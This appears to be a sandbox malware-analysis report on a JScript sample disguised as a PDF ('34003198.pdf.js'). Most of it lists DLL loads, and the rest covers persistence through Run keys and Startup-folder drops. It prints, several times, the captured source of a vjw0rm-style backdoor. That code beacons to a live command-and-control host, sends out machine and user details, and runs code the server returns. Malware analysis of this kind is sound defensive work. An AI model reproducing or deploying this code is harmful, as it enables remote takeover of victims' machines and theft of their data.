Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: 34003198.pdf.js

Static file information: File size 3953355 > 1048576

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "\|V\|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("\|U\|","\|V\|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\wscript.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198

Jump to behavior

Drops script or batch files to the startup folder

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js			Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

